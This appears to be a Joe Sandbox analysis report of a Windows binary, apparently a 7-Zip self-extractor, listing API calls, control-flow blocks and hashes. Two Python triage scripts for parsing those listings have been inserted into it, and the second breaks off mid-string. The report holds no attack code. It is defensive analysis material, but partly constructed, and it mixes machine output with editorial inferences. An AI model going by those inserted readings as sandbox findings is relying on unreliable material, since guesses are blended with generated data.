  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
• memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
• ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
• String ID:
• API String ID: 846840743-0
• Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
• Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
• Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
• Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

Control-flow Graph

APIs
  • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
  • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
  • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
• wsprintfW.USER32 ref: 004044A7
  • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
• #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                                                                                                                                                                                • String ID: 7zSfxFolder%02d$IA
                                                                                                                                                                                                                                                • API String ID: 3387708999-1317665167
                                                                                                                                                                                                                                                • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                                                                                                                                                                • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58
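The API annotation lines in this report follow one fixed shape: an optional "Part of subcall function XXXX:" prefix, then NAME.MODULE, an optional argument list, and the "ref:" address of the call site. The following is an added example, not code from Joe Sandbox or from the analysed sample: a small Python parser that turns such lines into records and produces a triage summary (direct-call sequence, modules touched, ordinal imports, CRT new/delete sites, format strings). The sample input is the listing of the function above, copied verbatim; the function names are the example's own, and the assumption that the report joins a function's strings with "$" in the "String ID" field is marked in the code.

```python
import re
from collections import Counter

# Constructed sample: the API annotation lines of the function listing above
# (the routine whose last call site is 0x404533), copied verbatim from the report.
SAMPLE = """\
  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
  • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
  • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
• wsprintfW.USER32 ref: 004044A7
  • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
• #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
"""

# One annotation line: optional "Part of subcall function XXXX:" prefix,
# then NAME.MODULE, optional "(arg,arg,...)", then "ref: ADDR".
# NAME may be MSVC-decorated (??2@YAPAXI@Z) or an ordinal import (#17).
LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<subcall>[0-9A-Fa-f]+):\s*)?
        (?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)


def parse_api_lines(text):
    """Return one dict per annotation line, in report order."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised annotation line: {line!r}")
        args = m["args"]
        calls.append({
            "api": m["api"],
            "module": m["module"],
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m["ref"], 16),                       # call-site address
            "subcall": int(m["subcall"], 16) if m["subcall"] else None,
            "direct": m["subcall"] is None,                 # called by this function itself
        })
    return calls


def parse_string_id(string_id):
    """Split a report 'String ID' into its strings.
    Assumption: the report joins a function's strings with '$'."""
    return [s for s in string_id.split("$") if s]


def summarize(calls, string_id=""):
    """Quick triage view of a parsed listing."""
    direct = [c for c in calls if c["direct"]]
    return {
        # APIs the function itself calls, in address order as listed
        "direct_sequence": [c["api"] for c in direct],
        "modules": Counter(c["module"] for c in calls),
        # imports by ordinal hide the API name from a plain string search
        "ordinal_imports": [f'{c["module"]}!{c["api"]}'
                            for c in calls if c["api"].startswith("#")],
        # MSVC operator new / operator delete call sites
        "crt_new_delete": [c["ref"] for c in calls
                           if c["api"].startswith(("??2@", "??3@"))],
        # printf-style strings are usually the ones worth reading
        "format_strings": [s for s in parse_string_id(string_id) if "%" in s],
    }


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE), "7zSfxFolder%02d$IA").items():
        print(f"{key}: {value}")
```

On this listing the summary is the useful part: a direct sequence of SHGetSpecialFolderPathW then wsprintfW, paired with the format string 7zSfxFolder%02d, is the shape of a self-extractor composing a numbered extraction directory under a shell special folder. That combination, rather than any single API, is what belongs in a triage note.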

Control-flow Graph

Rendered in the original report as an interactive graph with blocks marked Executed / Not Executed; only the graph's recoverable facts are kept here. Entry block 0x408EA4-0x408EBF; the function extends to about 0x4093FE. Internal callees: 0x4010E2, 0x4065EA, 0x408726, 0x40874D, 0x408761, 0x4087EA, 0x408835, 0x408858, 0x408931, 0x408963, 0x408A55, 0x408AA0, 0x408B7C, 0x408C96, 0x408D21, 0x408E83, 0x40AEF3, 0x40CDB8, 0x40D6CB, 0x40D6F0, 0x40D94B, 0x40E811, 0x40E8DA, 0x40E959, 0x40CE70 and 0x40F160 (the call at 0x4093D7 is recorded with both 0x40CE70 and 0x40F160 as targets). API calls inside the graph: ??2@YAPAXI@Z (operator new) at three sites.
APIs
• ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
• ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??2@
• String ID: IA$IA
• API String ID: 1033339047-1400641299
• Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
• Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
• Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
• Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

Control-flow Graph

Rendered in the original report as an interactive graph (legend: Executed / Not Executed). Three blocks: entry 0x410CD0-0x410D1A, which calls 0x410B9A and free, then 0x410D1C-0x410D1E and the exit block 0x410D22-0x410D23.
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: free
• String ID: $KA$4KA$HKA$\KA
• API String ID: 1294909896-3316857779
• Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
• Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
• Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
• Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

Control-flow Graph

Rendered in the original report as an interactive graph (legend: Executed / Not Executed). Entry block 0x4096C7-0x40970F (_EH_prolog, then call 0x4010E2); the function extends to about 0x409BA4. Internal callees: 0x4010E2, 0x40118A, 0x408E4E, 0x408EA4 (the function whose graph appears above), 0x409403, 0x409425, 0x4094B1, 0x4094E0, 0x409530, 0x4095B7, 0x409603, 0x40969D, 0x409C13, 0x409F49, 0x409FB4, 0x40E959, 0x40EB19, 0x40EB24, 0x40EBF7. API calls inside the graph: _EH_prolog, and ??2@YAPAXI@Z (operator new) at two sites.
APIs
• _EH_prolog.MSVCRT ref: 004096D0
• ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
• ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
  • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??2@$H_prolog
• String ID: HIA
• API String ID: 3431946709-2712174624
• Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
• Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
• Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

Control-flow Graph

Basic blocks (node id, address range, calls made):
• 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2
• 1240 402893-4028af call 40dcc7
• 1242 4028b5-4028ba
• 1243 40297f
• 1244 4028c0-4028ca
• 1245 402981-402985
• 1246 4028cd-4028d2
• 1247 402911-402916
• 1248 4028d4-4028d9
• 1249 40293b-40295f memmove
• 1250 4028db-4028ee memcmp
• 1251 402918-40292b memcmp
• 1252 4028f4-4028fe
• 1253 40297b-40297d
• 1254 40290b-40290f
• 1255 40292d-402939
• 1256 402961-402968
• 1257 40296e-402979
• 1258 402900-402906 call 402640
• 1259 402890
Edges: 1236->1240, 1240->1242, 1240->1243, 1242->1243, 1242->1244, 1243->1245, 1244->1246, 1246->1247, 1246->1248, 1247->1249, 1247->1251, 1248->1249, 1248->1250, 1249->1256, 1249->1257, 1250->1252, 1250->1253, 1251->1254, 1251->1255, 1252->1243, 1252->1258, 1253->1245, 1254->1246, 1255->1246, 1256->1257, 1256->1259, 1257->1245, 1258->1254, 1259->1240
APIs
• lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
• lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
• memcmp.MSVCRT(?,?,?), ref: 004028E4
• memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
• memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: lstrlenmemcmp$memmove
• String ID:
• API String ID: 3251180759-0
• Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
• Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
• Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
• Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

Control-flow Graph

Basic blocks (node id, address range, calls made):
• 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread
• 1270 401563 call 40786b
• 1271 401568-401583 WaitForSingleObject
• 1273 401585-401588
• 1274 4015b7-4015bd
• 1275 40161b
• 1276 4015bf-4015d4 GetExitCodeThread
• 1277 40158a-40158d
• 1278 4015ab
• 1279 4015ad-4015b5 call 407776
• 1280 401620-401623
• 1281 4015d6-4015d8
• 1282 4015de-4015e9
• 1283 4015a7-4015a9
• 1284 40158f-401592
• 1286 4015da-4015dc
• 1287 4015f1-4015fa
• 1288 4015eb-4015ec
• 1289 4015a3-4015a5
• 1290 401594-401597
• 1292 4015ee-4015ef
• 1293 401605-401611 SetLastError
• 1294 4015fc-401603
• 1295 401599-40159c
• 1296 40159e-4015a1
• 1297 401613-401618 call 407776
Edges: 1263->1270, 1263->1271, 1270->1271, 1271->1273, 1271->1274, 1273->1277, 1273->1278, 1274->1275, 1274->1276, 1275->1280, 1276->1281, 1276->1282, 1277->1283, 1277->1284, 1278->1279, 1279->1275, 1281->1282, 1281->1286, 1282->1287, 1282->1288, 1283->1279, 1284->1289, 1284->1290, 1286->1280, 1287->1293, 1287->1294, 1288->1292, 1289->1279, 1290->1295, 1290->1296, 1292->1297, 1293->1297, 1294->1275, 1294->1293, 1295->1275, 1295->1296, 1296->1292, 1297->1275
APIs
• CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
• WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
• String ID:
• API String ID: 359084233-0
• Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
• Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
• Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
• Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

Control-flow Graph

Basic blocks (node id, address range, calls made):
• 1300 401986-401995 CreateDirectoryW
• 1301 4019c7-4019cb
• 1302 401997-4019a4 GetLastError
• 1303 4019b1-4019be GetFileAttributesW
• 1304 4019a6
• 1305 4019a7-4019b0 SetLastError
• 1306 4019c0-4019c2
• 1307 4019c4-4019c5
Edges: 1300->1301, 1300->1302, 1302->1303, 1302->1304, 1303->1301, 1303->1306, 1304->1305, 1306->1301, 1306->1307, 1307->1305
APIs
• CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
• GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
• SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ErrorLast$AttributesCreateDirectoryFile
• String ID:
• API String ID: 635176117-0
• Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
• Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
• Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
• Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89
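The two API listings above (the thread runner at 40150b with its error-formatting subroutine 407776, and the directory-creation helper at 401986) print every argument as a raw hex stack slot. The following Python script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in exactly that format and decodes the constants a reviewer would otherwise look up by hand. FormatMessageW's 00001100 is FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM, SetLastError's 000000B7 is ERROR_ALREADY_EXISTS (the classic "create the directory, tolerate it already existing, then confirm with GetFileAttributesW" idiom), and ??2@YAPAXI@Z is MSVC's operator new. The parameter counts, flag bits and error codes come from the Win32 SDK headers; the sample lines are copied from the report; the names ARITY, DECODERS, parse_api_lines and annotate are the example's own. The script also makes one caveat explicit: the report prints more stack slots than the API has parameters (CreateDirectoryW takes two, twelve slots are shown), so only the leading slots are arguments and the rest, such as the recurring 0000FDE9 (65001, the CP_UTF8 code page, presumably left by a nearby string-conversion call), are caller stack contents.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function entry.
Sample lines are copied from this report; parameter counts, flag bits and
error codes come from the Win32 SDK headers. Joe Sandbox prints a fixed run
of stack slots per call: only the first ARITY[api] slots are parameters."""
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple, Union

API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*"
    r"(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
ARITY = {  # real parameter counts of the APIs seen in these entries
    "CreateThread": 6, "WaitForSingleObject": 2, "GetExitCodeThread": 2,
    "CreateDirectoryW": 2, "GetFileAttributesW": 1, "GetLastError": 0,
    "SetLastError": 1, "FormatMessageW": 7, "LocalFree": 1, "lstrlenA": 1,
    "lstrlenW": 1, "lstrcpyW": 2, "wvsprintfW": 3, "memcmp": 3, "memmove": 3,
    "??2@YAPAXI@Z": 1, "??3@YAXPAX@Z": 1,
}
DEMANGLE = {"??2@YAPAXI@Z": "operator new(unsigned int)", "??3@YAXPAX@Z": "operator delete(void *)"}
FORMAT_MESSAGE_FLAGS = {
    0x100: "FORMAT_MESSAGE_ALLOCATE_BUFFER", 0x200: "FORMAT_MESSAGE_IGNORE_INSERTS",
    0x400: "FORMAT_MESSAGE_FROM_STRING", 0x800: "FORMAT_MESSAGE_FROM_HMODULE",
    0x1000: "FORMAT_MESSAGE_FROM_SYSTEM", 0x2000: "FORMAT_MESSAGE_ARGUMENT_ARRAY",
}
WIN32_ERRORS = {2: "ERROR_FILE_NOT_FOUND", 3: "ERROR_PATH_NOT_FOUND", 5: "ERROR_ACCESS_DENIED", 0xB7: "ERROR_ALREADY_EXISTS"}


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask symbolically; bits not in the table stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    mask = 0
    for bit in table:
        mask |= bit
    leftover = value & ~mask & 0xFFFFFFFF
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "0"


# (api, parameter index) -> (parameter name, decoder for its value)
DECODERS: Dict[Tuple[str, int], Tuple[str, Callable[[int], str]]] = {
    ("FormatMessageW", 0): ("dwFlags", lambda v: decode_flags(v, FORMAT_MESSAGE_FLAGS)),
    ("SetLastError", 0): ("dwErrCode", lambda v: WIN32_ERRORS.get(v, f"0x{v:X}")),
    ("CreateThread", 2): ("lpStartAddress", lambda v: f"0x{v:08X}"),
}


class Call(NamedTuple):
    api: str
    module: str
    ref: int                     # address of the call instruction
    args: List[Union[int, str]]  # every stack slot the report printed
    subcall: Optional[int]       # owning function when marked "Part of subcall"

    @property
    def real_args(self) -> List[Union[int, str]]:
        # Slots that are actual parameters; unknown APIs keep every slot.
        return self.args[: ARITY.get(self.api, len(self.args))]


def _parse_arg(tok: str) -> Union[int, str]:
    try:
        return int(tok, 16)  # "0040129C" -> 0x40129C, "-00000001" -> -1
    except ValueError:
        return tok           # "?" or a string literal such as "ExecuteFile"


def parse_api_lines(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue         # headers such as "APIs"
        args = [_parse_arg(t.strip()) for t in m["args"].split(",") if t.strip()]
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["module"], int(m["ref"], 16), args, sub))
    return calls


def annotate(call: Call) -> Dict[str, str]:
    """Symbolic readings of the decodable parameters of one call."""
    out: Dict[str, str] = {}
    if call.api in DEMANGLE:
        out["symbol"] = DEMANGLE[call.api]
    for i, arg in enumerate(call.real_args):
        entry = DECODERS.get((call.api, i))
        if entry and isinstance(arg, int):
            out[entry[0]] = entry[1](arg & 0xFFFFFFFF)
    return out


# Copied from the two function entries above (report text, not constructed).
SAMPLE = """
• CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
• WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
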